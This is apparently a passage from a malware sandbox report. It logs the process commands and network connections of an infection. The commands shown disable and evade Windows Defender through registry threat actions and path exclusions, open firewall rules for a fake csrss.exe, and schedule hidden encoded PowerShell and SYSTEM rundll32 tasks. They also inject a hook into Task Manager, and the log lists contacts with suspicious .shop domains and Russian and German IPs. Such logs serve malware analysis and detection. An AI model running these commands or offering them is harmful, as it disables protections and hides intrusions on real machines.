\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gQoElPrcH" /SC once /ST 00:57:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gQoElPrcH"

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gQoElPrcH"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 21:03:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\AQBKmYi.exe\" XT /iCsite_idiFA 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BAnwxolbGpCzXNxkj"

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\AQBKmYi.exe

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\AQBKmYi.exe XT /iCsite_idiFA 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\PWRvhM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\AvxxVxR.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "qbSDwEgyNYPZlGA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\ACMxZui.xml" /RU "SYSTEM"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\lmalwfO.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\uvpBegG.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\GDwEUmD.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 17:08:32 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\GYQTtcim\mEUtEMq.dll\",#1 /Pbsite_idsVj 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "QhciBzJOokLnyYZub"

\??\c:\windows\system32\rundll32.EXE

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\GYQTtcim\mEUtEMq.dll",#1 /Pbsite_idsVj 385118

C:\Windows\SysWOW64\rundll32.exe

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\GYQTtcim\mEUtEMq.dll",#1 /Pbsite_idsVj 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

Network

Country Destination Domain Proto
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 167.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 affordcharmcropwo.shop udp
US 172.67.181.34:443 affordcharmcropwo.shop tcp
US 8.8.8.8:53 cleartotalfisherwo.shop udp
US 104.21.72.132:443 cleartotalfisherwo.shop tcp
US 8.8.8.8:53 34.181.67.172.in-addr.arpa udp
US 8.8.8.8:53 worryfillvolcawoi.shop udp
US 172.67.199.191:443 worryfillvolcawoi.shop tcp
US 8.8.8.8:53 enthusiasimtitleow.shop udp
US 104.21.18.233:443 enthusiasimtitleow.shop tcp
US 8.8.8.8:53 132.72.21.104.in-addr.arpa udp
US 8.8.8.8:53 71.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 191.199.67.172.in-addr.arpa udp
US 8.8.8.8:53 dismissalcylinderhostw.shop udp
US 172.67.205.132:443 dismissalcylinderhostw.shop tcp
US 8.8.8.8:53 diskretainvigorousiw.shop udp
US 172.67.211.165:443 diskretainvigorousiw.shop tcp
US 8.8.8.8:53 233.18.21.104.in-addr.arpa udp
US 8.8.8.8:53 132.205.67.172.in-addr.arpa udp
US 8.8.8.8:53 communicationgenerwo.shop udp
US 104.21.83.19:443 communicationgenerwo.shop tcp
US 8.8.8.8:53 pillowbrocccolipe.shop udp
US 104.21.47.56:443 pillowbrocccolipe.shop tcp
US 8.8.8.8:53 165.211.67.172.in-addr.arpa udp
US 8.8.8.8:53 19.83.21.104.in-addr.arpa udp
US 8.8.8.8:53 56.47.21.104.in-addr.arpa udp
RU 193.233.132.167:80 193.233.132.167 tcp
DE 185.172.128.33:8970 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 productivelookewr.shop udp
US 172.67.150.207:443 productivelookewr.shop tcp
US 8.8.8.8:53 tolerateilusidjukl.shop udp
US 172.67.147.41:443 tolerateilusidjukl.shop tcp
US 8.8.8.8:53 33.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 207.150.67.172.in-addr.arpa udp
US 8.8.8.8:53 41.147.67.172.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 shatterbreathepsw.shop udp
US 172.67.169.43:443 shatterbreathepsw.shop tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 shortsvelventysjo.shop udp
US 104.21.16.225:443 shortsvelventysjo.shop tcp
US 8.8.8.8:53 43.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 234.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 incredibleextedwj.shop udp
US 104.21.86.106:443 incredibleextedwj.shop tcp
US 8.8.8.8:53 alcojoldwograpciw.shop udp
